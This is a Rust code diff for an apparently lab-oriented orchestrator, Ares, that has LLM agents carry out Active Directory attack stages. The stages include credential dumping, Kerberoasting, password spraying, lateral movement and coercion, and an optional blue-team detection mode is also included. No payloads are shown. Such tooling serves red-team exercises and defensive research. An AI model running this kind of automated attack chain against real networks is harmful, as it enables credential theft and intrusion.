+async fn requeue_vuln(dispatcher: &Dispatcher, vuln: &VulnerabilityInfo) -> Result<()> { + let key = dispatcher.state.vuln_queue_key().await; + let mut conn = dispatcher.queue.connection(); + let json = serde_json::to_string(vuln)?; + let score = vuln.priority as f64; + let _: () = conn.zadd(&key, &json, score).await?; + Ok(()) +} diff --git a/ares-cli/src/orchestrator/llm_runner.rs b/ares-cli/src/orchestrator/llm_runner.rs new file mode 100644 index 00000000..99a4d621 --- /dev/null +++ b/ares-cli/src/orchestrator/llm_runner.rs @@ -0,0 +1,372 @@ +//! LLM task runner — drives tasks through the Rust agent loop. +//! +//! Replaces the Python dreadnode Agent for LLM-driven tasks. +//! The runner builds prompts, calls the LLM, dispatches tool calls to +//! Python workers via Redis, and handles callbacks in Rust. + +use std::sync::{Arc, OnceLock}; + +use anyhow::Result; +use tracing::{debug, info, warn}; + +use ares_llm::prompt::templates; +use ares_llm::prompt::StateSnapshot; +use ares_llm::tool_registry::{self, AgentRole}; +use ares_llm::{ + run_agent_loop, AgentLoopConfig, AgentLoopOutcome, CallbackHandler, LlmProvider, LoopEndReason, + ToolDispatcher, +}; + +use crate::orchestrator::state::SharedState; + +// --------------------------------------------------------------------------- +// LLM task runner +// --------------------------------------------------------------------------- + +/// Drives LLM-powered tasks through the Rust agent loop. +/// +/// Owns an LLM provider and tool dispatcher, and builds prompts from +/// the current operation state. +#[allow(dead_code)] +pub struct LlmTaskRunner { + provider: Box<dyn LlmProvider>, + model_name: String, + dispatcher: Arc<ToolDispatcher>, + state: SharedState, + config: AgentLoopConfig, + /// Deferred callback handler — set after construction to break the + /// `LlmTaskRunner → Dispatcher → LlmTaskRunner` circular dependency. + callback_handler: OnceLock<Arc<CallbackHandler>>, +} + +impl LlmTaskRunner { + pub fn new( + provider: Box<dyn LlmProvider>, + model_name: String, + dispatcher: Arc<ToolDispatcher>, + state: SharedState, + ) -> Self { + let config = AgentLoopConfig { + model: model_name.clone(), + ..AgentLoopConfig::default() + }; + Self { + provider, + model_name, + dispatcher, + state, + config, + callback_handler: OnceLock::new(), + } + } + + /// Set the callback handler after construction. + /// + /// This is safe to call from `&self` (interior mutability via `OnceLock`), + /// which lets us break the circular dependency: the handler needs the + /// `Dispatcher`, which itself holds an `Arc<LlmTaskRunner>`. + pub fn set_callback_handler(&self, handler: Arc<CallbackHandler>) { + let _ = self.callback_handler.set(handler); + } + + /// Execute a task through the LLM agent loop. + /// + /// This is the main entry point called by the orchestrator when + /// a task should be driven by the LLM rather than pushed to a + /// Python worker's full agent loop. + pub async fn execute_task( + &self, + task_type: &str, + task_id: &str, + role: AgentRole, + payload: &serde_json::Value, + ) -> Result<AgentLoopOutcome> { + let role_str = role.as_str(); + + // 1. Snapshot state (releases RwLock before LLM calls) + let snapshot = self.state.snapshot().await; + + // 2. Build system prompt from agent template + let system_prompt = build_system_prompt(role, &snapshot)?; + + // 3. Build task prompt from Tera template + payload + let task_prompt = build_task_prompt(task_type, task_id, payload, &snapshot)?; + + // 4.
Get tool schemas for this role + let tools = tool_registry::tools_for_role(role); + + info!( + task_id = task_id, + task_type = task_type, + role = role_str, + tools = tools.len(), + "Starting LLM agent loop" + ); + + // 5. Run the agent loop + let outcome = run_agent_loop( + self.provider.as_ref(), + Arc::clone(&self.dispatcher), + &self.config, + &system_prompt, + &task_prompt, + role_str, + task_id, + &tools, + self.callback_handler.get().cloned(), + ) + .await; + + log_outcome(task_id, &outcome); + + Ok(outcome) + } +} + +// --------------------------------------------------------------------------- +// Prompt building helpers +// --------------------------------------------------------------------------- + +/// Build the system prompt for a given agent role. +fn build_system_prompt(role: AgentRole, snapshot: &StateSnapshot) -> Result<String> { + // Get capabilities from the tool definitions for this role + let tools = tool_registry::tools_for_role(role); + let capabilities: Vec<String> = tools + .iter() + .filter(|t| !tool_registry::is_callback_tool(&t.name)) + .map(|t| t.name.clone()) + .collect(); + + let template_name = match role { + AgentRole::Recon => templates::TEMPLATE_RECON, + AgentRole::CredentialAccess => templates::TEMPLATE_CREDENTIAL_ACCESS, + AgentRole::Cracker => templates::TEMPLATE_CRACKER, + AgentRole::Acl => templates::TEMPLATE_ACL, + AgentRole::Privesc => templates::TEMPLATE_PRIVESC, + AgentRole::Lateral => templates::TEMPLATE_LATERAL, + AgentRole::Coercion => templates::TEMPLATE_COERCION, + AgentRole::Orchestrator => templates::TEMPLATE_ORCHESTRATOR, + }; + + // Render system instructions (no per-role capability map for now) + let system_instructions = templates::render_system_instructions(None)?; + + // Render agent-specific instructions + let agent_instructions = templates::render_agent_instructions( + template_name, + &capabilities, + false, + &snapshot.undominated_forests, + )?; + + Ok(format!("{system_instructions}\n\n{agent_instructions}")) +} + +/// Build the task-specific prompt from payload and state. +fn build_task_prompt( + task_type: &str, + task_id: &str, + payload: &serde_json::Value, + snapshot: &StateSnapshot, +) -> Result<String> { + // Use the PromptBuilder from ares-llm + let prompt = + ares_llm::prompt::generate_task_prompt(task_type, task_id, payload, Some(snapshot)); + + match prompt { + Some(p) => Ok(p), + None => { + warn!( + task_type = task_type, + task_id = task_id, + "No prompt template for task type, using raw payload" + ); + Ok(format!( + "## Task: {task_id}\n\nType: {task_type}\n\nPayload:\n```json\n{}\n```\n\nComplete this task and call `task_complete` with results.", + serde_json::to_string_pretty(payload).unwrap_or_default() + )) + } + } +} + +/// Map task type string to AgentRole.
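+/// +/// Example: role_for_task_type("secretsdump") == Some(AgentRole::CredentialAccess). +/// Unmapped types return None; do_submit consults this mapping only after +/// failing to parse target_role directly, and drops the task if both fail.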
+pub fn role_for_task_type(task_type: &str) -> Option<AgentRole> { + match task_type { + "recon" | "nmap" | "bloodhound" | "delegation_enum" | "certipy_find" => { + Some(AgentRole::Recon) + } + "credential_access" | "secretsdump" | "share_spider" | "kerberoast" | "asrep_roast" + | "password_spray" => Some(AgentRole::CredentialAccess), + "crack" => Some(AgentRole::Cracker), + "lateral" | "lateral_movement" => Some(AgentRole::Lateral), + "exploit" | "privesc_enumeration" => Some(AgentRole::Privesc), + "coercion" => Some(AgentRole::Coercion), + "acl_analysis" => Some(AgentRole::Acl), + "command" => None, // Command tasks go to whatever role is specified + _ => None, + } +} + +// --------------------------------------------------------------------------- +// Logging +// --------------------------------------------------------------------------- + +fn log_outcome(task_id: &str, outcome: &AgentLoopOutcome) { + match &outcome.reason { + LoopEndReason::TaskComplete { result, .. } => { + info!( + task_id = task_id, + steps = outcome.steps, + tool_calls = outcome.tool_calls_dispatched, + input_tokens = outcome.total_usage.input_tokens, + output_tokens = outcome.total_usage.output_tokens, + "Task completed via LLM: {result}" + ); + } + LoopEndReason::RequestAssistance { issue, .. } => { + warn!( + task_id = task_id, + steps = outcome.steps, + "LLM agent requested assistance: {issue}" + ); + } + LoopEndReason::MaxSteps => { + warn!( + task_id = task_id, + steps = outcome.steps, + "LLM agent hit max steps limit" + ); + } + LoopEndReason::EndTurn { content } => { + debug!( + task_id = task_id, + steps = outcome.steps, + "LLM agent ended turn: {content}" + ); + } + LoopEndReason::MaxTokens => { + warn!( + task_id = task_id, + steps = outcome.steps, + "LLM agent hit max tokens" + ); + } + LoopEndReason::Error(err) => { + warn!( + task_id = task_id, + steps = outcome.steps, + "LLM agent loop error: {err}" + ); + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_role_for_task_type_recon_variants() { + for tt in &[ + "recon", + "nmap", + "bloodhound", + "delegation_enum", + "certipy_find", + ] { + assert_eq!( + role_for_task_type(tt), + Some(AgentRole::Recon), + "Failed for: {tt}" + ); + } + } + + #[test] + fn test_role_for_task_type_credential_access_variants() { + for tt in &[ + "credential_access", + "secretsdump", + "share_spider", + "kerberoast", + "asrep_roast", + "password_spray", + ] { + assert_eq!( + role_for_task_type(tt), + Some(AgentRole::CredentialAccess), + "Failed for: {tt}" + ); + } + } + + #[test] + fn test_role_for_task_type_other_roles() { + assert_eq!(role_for_task_type("crack"), Some(AgentRole::Cracker)); + assert_eq!(role_for_task_type("lateral"), Some(AgentRole::Lateral)); + assert_eq!( + role_for_task_type("lateral_movement"), + Some(AgentRole::Lateral) + ); + assert_eq!(role_for_task_type("exploit"), Some(AgentRole::Privesc)); + assert_eq!( + role_for_task_type("privesc_enumeration"), + Some(AgentRole::Privesc) + ); + assert_eq!(role_for_task_type("coercion"), Some(AgentRole::Coercion)); + assert_eq!(role_for_task_type("acl_analysis"), Some(AgentRole::Acl)); + } + + #[test] + fn test_role_for_task_type_unmapped() { + assert_eq!(role_for_task_type("command"), None); + assert_eq!(role_for_task_type("unknown"), None); + assert_eq!(role_for_task_type(""), None); + } + + #[test] + fn test_build_system_prompt_all_roles() { + let snapshot = StateSnapshot::default(); + for role in &[ + AgentRole::Recon, + AgentRole::CredentialAccess, + AgentRole::Cracker, + AgentRole::Acl,
AgentRole::Privesc, + AgentRole::Lateral, + AgentRole::Coercion, + AgentRole::Orchestrator, + ] { + let result = build_system_prompt(*role, &snapshot); + assert!(result.is_ok(), "Failed for role: {:?}", role); + let prompt = result.unwrap(); + assert!(!prompt.is_empty(), "Empty prompt for role: {:?}", role); + } + } + + #[test] + fn test_build_task_prompt_known_types() { + let snapshot = StateSnapshot::default(); + let payload = serde_json::json!({ + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "techniques": ["nmap"] + }); + + let result = build_task_prompt("recon", "t-1", &payload, &snapshot); + assert!(result.is_ok()); + assert!(!result.unwrap().is_empty()); + } + + #[test] + fn test_build_task_prompt_unknown_type_falls_back() { + let snapshot = StateSnapshot::default(); + let payload = serde_json::json!({"foo": "bar"}); + + let result = build_task_prompt("unknown_type", "t-1", &payload, &snapshot); + assert!(result.is_ok()); + let prompt = result.unwrap(); + assert!(prompt.contains("unknown_type")); + assert!(prompt.contains("task_complete")); + } +} diff --git a/ares-cli/src/orchestrator/mod.rs b/ares-cli/src/orchestrator/mod.rs new file mode 100644 index 00000000..0d9aa4da --- /dev/null +++ b/ares-cli/src/orchestrator/mod.rs @@ -0,0 +1,748 @@ +//! Ares Orchestrator — Rust-native orchestration loop. +//! +//! Startup sequence: +//! 1. Load config from env vars +//! 2. Connect to Redis +//! 3. Acquire the operation lock +//! 4. Load shared state from Redis +//! 5. Spawn background tasks: heartbeat monitor, result consumer, deferred +//! processor, cost summary, automation tasks, exploitation workflow, +//! discovery poller, state refresh +//! 6. Enter the main orchestration loop + +mod automation; +mod automation_spawner; +#[cfg(feature = "blue")] +mod blue; +mod bootstrap; +pub(crate) mod callback_handler; +mod completion; +mod config; +mod cost_summary; +mod deferred; +mod dispatcher; +mod exploitation; +mod llm_runner; +mod monitoring; +mod output_extraction; +mod recovery; +mod result_processing; +mod results; +mod routing; +mod state; +mod task_queue; +mod throttling; +mod tool_dispatcher; + +use std::sync::Arc; + +use anyhow::{Context, Result}; +use tokio::signal; +use tokio::sync::watch; +use tracing::{error, info, warn}; + +use self::automation_spawner::spawn_automation_tasks; +use self::bootstrap::{bootstrap_meta, dispatch_initial_recon}; +use self::config::OrchestratorConfig; +use self::cost_summary::spawn_cost_summary; +use self::deferred::DeferredQueue; +use self::dispatcher::Dispatcher; +use self::monitoring::{spawn_heartbeat_monitor, spawn_lock_keeper, AgentRegistry}; +use self::results::spawn_result_consumer; +use self::routing::ActiveTaskTracker; +use self::state::SharedState; +use self::task_queue::TaskQueue; +use self::throttling::Throttler; + +pub async fn run() -> Result<()> { + let _telemetry = ares_core::telemetry::init_telemetry( + ares_core::telemetry::TelemetryConfig::new("ares-orchestrator"), + ); + run_inner().await +} + +async fn run_inner() -> Result<()> { + info!( + version = env!("CARGO_PKG_VERSION"), + "ares-orchestrator starting" + ); + + // --- Blue-only mode: skip red orchestrator, just run blue investigation poller --- + #[cfg(feature = "blue")] + if std::env::var("ARES_BLUE_ONLY").as_deref() == Ok("1") { + return run_blue_only().await; + } + + let config = + Arc::new(OrchestratorConfig::from_env().context("Failed to load config from environment")?); + + // Load the YAML config (optional — provides agent definitions, vuln priorities, 
etc.) + let ares_config = match ares_core::config::AresConfig::from_env() { + Ok(cfg) => { + info!( + config_name = %cfg.operation.name, + agent_roles = cfg.agents.len(), + "Loaded YAML config" + ); + Some(Arc::new(cfg)) + } + Err(e) => { + info!("No YAML config loaded (using env vars only): {e}"); + None + } + }; + + info!( + operation_id = %config.operation_id, + max_concurrent = config.max_concurrent_tasks, + has_yaml_config = ares_config.is_some(), + "Configuration loaded" + ); + + let queue = TaskQueue::connect(&config.redis_url) + .await + .context("Failed to connect to Redis")?; + + let acquired = queue + .try_acquire_lock(&config.operation_id, config.lock_ttl) + .await?; + if !acquired { + anyhow::bail!( + "Operation {} is locked by another orchestrator", + config.operation_id + ); + } + + let shared_state = SharedState::new(config.operation_id.clone()); + shared_state + .load_from_redis(&queue) + .await + .context("Failed to load state from Redis")?; + + { + let mut state = shared_state.write().await; + if state.target_ips.is_empty() && !config.target_ips.is_empty() { + state.target_ips = config.target_ips.clone(); + info!( + target_domain = %config.target_domain, + target_ips = ?config.target_ips, + "Seeded target info from operation payload" + ); + } + // Seed target domain into state so automation tasks have it + if !config.target_domain.is_empty() { + let domain = config.target_domain.to_lowercase(); + if !state.domains.contains(&domain) { + state.domains.push(domain.clone()); + // Also persist to Redis + let domain_key = format!("ares:op:{}:domains", state.operation_id); + let mut conn = queue.connection(); + let _: Result<(), _> = + redis::AsyncCommands::sadd(&mut conn, &domain_key, &domain).await; + let _: Result<(), _> = + redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; + info!(domain = %domain, "Seeded target domain"); + } + + // Seed domain_controllers from target IPs so automation tasks + // (AS-REP roast, Kerberoast, BloodHound, delegation enum) can fire + // immediately without waiting for recon to report back. + // Probe port 88 (Kerberos) to find a real DC, don't blindly use first IP. + if state.domain_controllers.is_empty() { + let dc_ip = bootstrap::probe_dc_port(&config.target_ips).await; + if let Some(ref ip) = dc_ip { + let dc_key = format!( + "{}:{}:{}", + ares_core::state::KEY_PREFIX, + state.operation_id, + ares_core::state::KEY_DC_MAP, + ); + let mut conn = queue.connection(); + let _: Result<(), _> = + redis::AsyncCommands::hset(&mut conn, &dc_key, &domain, ip).await; + state.domain_controllers.insert(domain.clone(), ip.clone()); + info!( + domain = %domain, + dc_ip = %ip, + "Seeded domain controller from target IPs (port 88 probe)" + ); + + // Also register the credential's domain (may differ from target_domain, + // e.g., child.contoso.local vs contoso.local). + // This ensures automation tasks (spray, kerberoast) can find a DC + // for the credential's domain. 
+ if let Some(ref cred) = config.initial_credential { + let cred_domain = cred.domain.to_lowercase(); + if cred_domain != domain && !cred_domain.is_empty() { + let _: Result<(), _> = + redis::AsyncCommands::hset(&mut conn, &dc_key, &cred_domain, ip) + .await; + state + .domain_controllers + .insert(cred_domain.clone(), ip.clone()); + // Also add this domain to the domains set + if !state.domains.contains(&cred_domain) { + state.domains.push(cred_domain.clone()); + let domain_key = format!("ares:op:{}:domains", state.operation_id); + let _: Result<(), _> = redis::AsyncCommands::sadd( + &mut conn, + &domain_key, + &cred_domain, + ) + .await; + } + info!( + cred_domain = %cred_domain, + dc_ip = %ip, + "Also registered credential domain in DC map" + ); + } + } + } else { + warn!("No target IP responded on port 88/389 — DC will be discovered by recon"); + } + } + + // Seed placeholder hosts for ALL target IPs (matches Python startup). + // This ensures all IPs appear in the host list even before recon runs, + // and detect_dc() on service results can trigger domain extraction. + { + let host_key = format!( + "{}:{}:{}", + ares_core::state::KEY_PREFIX, + state.operation_id, + ares_core::state::KEY_HOSTS, + ); + let mut conn = queue.connection(); + for ip in &config.target_ips { + if !state.hosts.iter().any(|h| h.ip == *ip) { + let placeholder = ares_core::models::Host { + ip: ip.clone(), + hostname: String::new(), + os: String::new(), + roles: vec![], + services: vec![], + is_dc: false, + owned: false, + }; + let data = serde_json::to_string(&placeholder).unwrap_or_default(); + let _: Result<(), _> = + redis::AsyncCommands::rpush(&mut conn, &host_key, &data).await; + state.hosts.push(placeholder); + } + } + let _: Result<(), _> = + redis::AsyncCommands::expire(&mut conn, &host_key, 86400i64).await; + info!( + count = config.target_ips.len(), + "Seeded placeholder hosts for all target IPs" + ); + } + } + } + + if let Some(ref cred) = config.initial_credential { + let credential = ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: cred.username.clone(), + password: cred.password.clone(), + domain: cred.domain.clone(), + source: "initial".to_string(), + discovered_at: Some(chrono::Utc::now()), + is_admin: false, + parent_id: None, + attack_step: 0, + }; + match shared_state.publish_credential(&queue, credential).await { + Ok(true) => info!( + username = %cred.username, + domain = %cred.domain, + "Seeded initial credential" + ), + Ok(false) => info!("Initial credential already exists (dedup)"), + Err(e) => warn!("Failed to seed initial credential: {e}"), + } + } + + // Write operation metadata to Redis so workers can discover us + bootstrap_meta(&queue, &config).await?; + + let tracker = ActiveTaskTracker::new(); + let registry = AgentRegistry::new(); + let throttler = Arc::new(Throttler::new(config.clone(), tracker.clone())); + let deferred = Arc::new(DeferredQueue::new(queue.clone(), config.clone())); + + // Priority: ARES_LLM_MODEL env var > config YAML agents.orchestrator.model + let model_spec = std::env::var("ARES_LLM_MODEL").ok().or_else(|| { + let config_path = std::env::var("ARES_CONFIG") + .unwrap_or_else(|_| "/ares/config/ares.yaml".to_string()); + std::fs::read_to_string(&config_path) + .ok() + .and_then(|content| { + let yaml: serde_yaml::Value = serde_yaml::from_str(&content).ok()?; + let model = yaml["agents"]["orchestrator"]["model"].as_str()?; + // Prefix with "openai/" if no provider prefix present + let spec = if model.contains('/') { + 
+                    model.to_string()
+                } else {
+                    format!("openai/{model}")
+                };
+                info!(config = %config_path, model = %spec, "Model loaded from config YAML");
+                Some(spec)
+            })
+    }).context("No LLM model configured — set ARES_LLM_MODEL or agents.orchestrator.model in config YAML")?;
+    let (provider, model_name) =
+        ares_llm::create_provider(&model_spec).context("Failed to create LLM provider")?;
+
+    // Credential auth throttle — prevents AD account lockout by rate-limiting
+    // auth-bearing tool calls per credential. Max 3 attempts per 30s window.
+    // GOAD lockout: 3 bad attempts / 30 min. With multiple concurrent agents,
+    // even correct passwords can fail if the account is already locked.
+    let auth_throttle = tool_dispatcher::AuthThrottle::new(3, std::time::Duration::from_secs(30));
+
+    // Choose tool dispatch strategy:
+    //   ARES_TOOL_DISPATCH=local → in-process via ares_tools::dispatch()
+    //   default                  → Redis queue for worker consumption (ares:tool_exec:{role})
+    let tool_disp: Arc<dyn tool_dispatcher::ToolDispatcher> =
+        if std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local") {
+            info!("Tool dispatch: local (in-process via ares-tools)");
+            Arc::new(tool_dispatcher::LocalToolDispatcher::new(
+                queue.clone(),
+                config.operation_id.clone(),
+                auth_throttle.clone(),
+            ))
+        } else {
+            info!("Tool dispatch: Redis queue (ares:tool_exec:{{role}})");
+            Arc::new(tool_dispatcher::RedisToolDispatcher::new(
+                queue.clone(),
+                config.operation_id.clone(),
+                auth_throttle.clone(),
+            ))
+        };
+
+    let llm_runner = Arc::new(llm_runner::LlmTaskRunner::new(
+        provider,
+        model_name.clone(),
+        tool_disp,
+        shared_state.clone(),
+    ));
+    info!(
+        model = %model_name,
+        "LLM runner initialized — Rust drives all agent loops"
+    );
+
+    // --- Central dispatcher ---
+    let dispatcher = Arc::new(Dispatcher::new(
+        queue.clone(),
+        tracker.clone(),
+        throttler.clone(),
+        deferred.clone(),
+        shared_state.clone(),
+        config.clone(),
+        ares_config.clone(),
+        llm_runner.clone(),
+    ));
+
+    // --- Wire orchestrator callback handler ---
+    // Deferred initialization: the handler needs the dispatcher, which contains
+    // the llm_runner, creating a circular dependency. OnceLock breaks the cycle.
+    let callback_handler = Arc::new(
+        callback_handler::OrchestratorCallbackHandler::new(shared_state.clone(), queue.clone())
+            .with_dispatcher(dispatcher.clone()),
+    );
+    llm_runner.set_callback_handler(callback_handler);
+    info!("Orchestrator callback handler wired (query + dispatch tools)");
+
+    // --- Shutdown signal ---
+    let (shutdown_tx, shutdown_rx) = watch::channel(false);
+
+    // --- Spawn background tasks ---
+
+    // Core infrastructure — lock keeper runs independently to prevent
+    // lock expiry even if heartbeat sweeps or Redis calls hang.
+    let lock_handle = spawn_lock_keeper(queue.clone(), config.clone(), shutdown_rx.clone());
+
+    let hb_handle = spawn_heartbeat_monitor(
+        queue.clone(),
+        registry.clone(),
+        tracker.clone(),
+        config.clone(),
+        shutdown_rx.clone(),
+    );
+
+    let (_result_handle, mut result_rx) = spawn_result_consumer(
+        queue.clone(),
+        tracker.clone(),
+        config.clone(),
+        shutdown_rx.clone(),
+    );
+
+    let deferred_handle = deferred::spawn_deferred_processor(
+        deferred.clone(),
+        dispatcher.clone(),
+        throttler.clone(),
+        config.clone(),
+        shutdown_rx.clone(),
+    );
+
+    let cost_handle = spawn_cost_summary(queue.clone(), config.clone(), shutdown_rx.clone());
+
+    // Exploitation workflow
+    let exploit_disp = dispatcher.clone();
+    let exploit_shutdown = shutdown_rx.clone();
+    let exploit_handle = tokio::spawn(async move {
+        exploitation::exploitation_workflow(exploit_disp, exploit_shutdown).await
+    });
+
+    // Discovery poller
+    let disc_disp = dispatcher.clone();
+    let disc_shutdown = shutdown_rx.clone();
+    let disc_handle =
+        tokio::spawn(
+            async move { result_processing::discovery_poller(disc_disp, disc_shutdown).await },
+        );
+
+    // State refresh
+    let refresh_disp = dispatcher.clone();
+    let refresh_shutdown = shutdown_rx.clone();
+    let refresh_handle =
+        tokio::spawn(
+            async move { automation::state_refresh(refresh_disp, refresh_shutdown).await },
+        );
+
+    // --- Automation tasks ---
+    let auto_handles = spawn_automation_tasks(dispatcher.clone(), shutdown_rx.clone());
+
+    // --- Blue team orchestrator (optional — enabled when ARES_BLUE_ENABLED=1) ---
+    // Inject observability URLs from YAML config into env vars (blue tools read env vars).
+    #[cfg(feature = "blue")]
+    if let Some(ref cfg) = ares_config {
+        if let Some(ref obs) = cfg.observability {
+            if !obs.loki_url.is_empty() && std::env::var("LOKI_URL").is_err() {
+                std::env::set_var("LOKI_URL", &obs.loki_url);
+            }
+            if !obs.loki_auth_token.is_empty() && std::env::var("LOKI_AUTH_TOKEN").is_err() {
+                std::env::set_var("LOKI_AUTH_TOKEN", &obs.loki_auth_token);
+            }
+            if !obs.prometheus_url.is_empty() && std::env::var("PROMETHEUS_URL").is_err() {
+                std::env::set_var("PROMETHEUS_URL", &obs.prometheus_url);
+            }
+        }
+    }
+    #[cfg(feature = "blue")]
+    let blue_handle = if std::env::var("ARES_BLUE_ENABLED").as_deref() == Ok("1") {
+        // Create a separate LLM provider for the blue team
+        let blue_model_spec = std::env::var("ARES_BLUE_LLM_MODEL")
+            .ok()
+            .filter(|s| !s.is_empty())
+            .unwrap_or_else(|| model_spec.clone());
+        let (blue_provider, blue_model) = ares_llm::create_provider(&blue_model_spec)
+            .context("Failed to create blue team LLM provider")?;
+
+        let blue_disp: Arc<dyn tool_dispatcher::ToolDispatcher> =
+            if std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local") {
+                Arc::new(tool_dispatcher::LocalToolDispatcher::new(
+                    queue.clone(),
+                    config.operation_id.clone(),
+                    auth_throttle.clone(),
+                ))
+            } else {
+                Arc::new(tool_dispatcher::RedisToolDispatcher::new(
+                    queue.clone(),
+                    config.operation_id.clone(),
+                    auth_throttle.clone(),
+                ))
+            };
+
+        info!(model = %blue_model, "Starting blue team orchestrator");
+        Some((
+            blue::spawn_blue_orchestrator(
+                blue_provider,
+                blue_model,
+                blue_disp,
+                config.redis_url.clone(),
+                shutdown_rx.clone(),
+            ),
+            blue::spawn_blue_auto_submit(
+                queue.clone(),
+                shared_state.clone(),
+                config.clone(),
+                blue_model_spec,
+                shutdown_rx.clone(),
+            ),
+        ))
+    } else {
+        None
+    };
+    #[cfg(not(feature = "blue"))]
+    let blue_handle: Option<(tokio::task::JoinHandle<()>, tokio::task::JoinHandle<()>)> = None;
+
+    // --- Recovery check ---
+    {
+        let recovery_mgr = recovery::OperationRecoveryManager::new(config.redis_url.clone());
+        match recovery_mgr.recover(&config.operation_id).await {
+            Ok(recovered) => {
+                if !recovered.requeued_task_ids.is_empty() || !recovered.failed_task_ids.is_empty()
+                {
+                    info!(
+                        requeued = recovered.requeued_task_ids.len(),
+                        failed = recovered.failed_task_ids.len(),
+                        "Recovery: re-enqueued interrupted tasks"
+                    );
+                }
+            }
+            Err(e) => {
+                // Recovery failure is non-fatal — we already loaded state above
+                warn!(err = %e, "Recovery check failed (non-fatal, continuing)");
+            }
+        }
+    }
+
+    // --- Clear stale stop signal ---
+    // On restart (e.g. re-running with BLUE_ENABLED after a completed op),
+    // the previous run's stop signal may still be in Redis. Clear it so the
+    // main loop doesn't exit immediately.
+    {
+        let mut conn = queue.connection();
+        let stop_key = ares_core::state::build_key(&config.operation_id, "stop_requested");
+        let _: Result<(), _> = redis::AsyncCommands::del(&mut conn, &stop_key).await;
+    }
+
+    // --- Completion monitor ---
+    let completion_disp = dispatcher.clone();
+    let completion_state = shared_state.clone();
+    let completion_shutdown = shutdown_rx.clone();
+    let completion_handle = tokio::spawn(async move {
+        completion::wait_for_completion(
+            &completion_state,
+            &completion_disp,
+            completion_shutdown,
+            std::time::Duration::from_secs(
+                ares_config
+                    .as_ref()
+                    .map(|c| c.timeouts.operation_timeout)
+                    .filter(|&t| t > 0)
+                    .unwrap_or(7200),
+            ),
+            std::time::Duration::from_secs(10),
+        )
+        .await;
+        info!("Completion monitor finished — operation complete");
+    });
+
+    info!(
+        operation_id = %config.operation_id,
+        automation_tasks = auto_handles.len(),
+        "Orchestration loop started — all background tasks running"
+    );
+
+    // --- Pre-flight tool availability check ---
+    // Wait briefly for workers to start and publish their tool inventories,
+    // then warn loudly about any critical missing tools.
+    {
+        tokio::time::sleep(std::time::Duration::from_secs(5)).await;
+        let missing = monitoring::preflight_tool_check(&mut queue.connection()).await;
+        if !missing.is_empty() {
+            for (role, tools) in &missing {
+                warn!(
+                    role = %role,
+                    missing = ?tools,
+                    "PREFLIGHT: worker is missing critical tools — operations will be degraded"
+                );
+            }
+        } else {
+            info!("Preflight tool check passed — all critical tools available");
+        }
+    }
+
+    // --- Dispatch initial reconnaissance (seeds the reactive automation pipeline) ---
+    if !config.target_ips.is_empty() {
+        let recon_count = dispatch_initial_recon(&dispatcher, &config).await;
+        info!(tasks = recon_count, "Initial recon dispatched");
+    } else {
+        warn!("No target IPs configured — skipping initial recon dispatch");
+    }
+
+    // --- Main loop ---
+    let mut stop_check = tokio::time::interval(std::time::Duration::from_secs(5));
+    stop_check.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Skip);
+
+    loop {
+        tokio::select! {
+            // Process completed task results
+            result = result_rx.recv() => {
+                match result {
+                    Some(completed) => {
+                        result_processing::process_completed_task(
+                            &completed,
+                            &dispatcher,
+                            &throttler,
+                        ).await;
+                    }
+                    None => {
+                        // Result consumer died — channel closed.
+                        // Respawn it after a brief delay.
+                        error!("Result consumer channel closed unexpectedly — restarting consumer");
+                        tokio::time::sleep(std::time::Duration::from_secs(2)).await;
+                        let (_new_handle, new_rx) = spawn_result_consumer(
+                            queue.clone(),
+                            tracker.clone(),
+                            config.clone(),
+                            shutdown_rx.clone(),
+                        );
+                        result_rx = new_rx;
+                    }
+                }
+            }
+
+            // Poll for remote stop signal from `ares-cli ops stop`
+            _ = stop_check.tick() => {
+                let mut conn = queue.connection();
+                match ares_core::state::is_stop_requested(&mut conn, &config.operation_id).await {
+                    Ok(true) => {
+                        info!("Remote stop requested via Redis — shutting down");
+                        break;
+                    }
+                    Ok(false) => {}
+                    Err(e) => {
+                        warn!(err = %e, "Failed to check stop signal");
+                    }
+                }
+            }
+
+            // Graceful shutdown on SIGTERM / SIGINT
+            _ = signal::ctrl_c() => {
+                info!("Shutdown signal received");
+                break;
+            }
+        }
+    }
+
+    // --- Graceful shutdown ---
+    info!("Shutting down background tasks...");
+    let _ = shutdown_tx.send(true);
+
+    // Blue investigations need time to finalize: score_against_ground_truth,
+    // set_status("completed"), release_lock, generate_report. 10s was too short.
+    let shutdown_timeout = std::time::Duration::from_secs(120);
+    tokio::select! {
+        _ = async {
+            let _ = tokio::join!(
+                lock_handle,
+                hb_handle,
+                deferred_handle,
+                cost_handle,
+                exploit_handle,
+                disc_handle,
+                refresh_handle,
+                completion_handle,
+            );
+            for h in auto_handles {
+                let _ = h.await;
+            }
+            if let Some((h, auto)) = blue_handle {
+                let _ = h.await;
+                let _ = auto.await;
+            }
+        } => {
+            info!("All background tasks stopped");
+        }
+        _ = tokio::time::sleep(shutdown_timeout) => {
+            warn!("Background task shutdown timed out");
+        }
+    }
+
+    // --- Finalize operation in Redis ---
+    // Write completion metadata, status key, clear lock and active pointer.
+    // Matches Python's operation completion sequence.
+    {
+        let mut conn = queue.connection();
+        let has_da = shared_state.read().await.has_domain_admin;
+        let status = if has_da { "completed" } else { "stopped" };
+        match ares_core::state::finalize_operation(&mut conn, &config.operation_id, status).await {
+            Ok(()) => info!(
+                operation_id = %config.operation_id,
+                status = status,
+                "Operation finalized in Redis"
+            ),
+            Err(e) => warn!(
+                operation_id = %config.operation_id,
+                err = %e,
+                "Failed to finalize operation in Redis"
+            ),
+        }
+    }
+
+    info!("ares-orchestrator stopped");
+    Ok(())
+}
+
+/// Run in blue-only mode: just the investigation poller, no red team.
+///
+/// Requires only `ARES_REDIS_URL` and an LLM model. No operation ID needed.
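+///
+/// A hypothetical invocation sketch (env vars as read below; the model spec
+/// is a placeholder):
+///
+/// ```ignore
+/// std::env::set_var("ARES_BLUE_ONLY", "1");   // checked in run_inner()
+/// std::env::set_var("ARES_REDIS_URL", "redis://127.0.0.1:6379/0");
+/// std::env::set_var("ARES_BLUE_LLM_MODEL", "openai/<model>"); // or ARES_LLM_MODEL
+/// run().await?;
+/// ```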
+#[cfg(feature = "blue")]
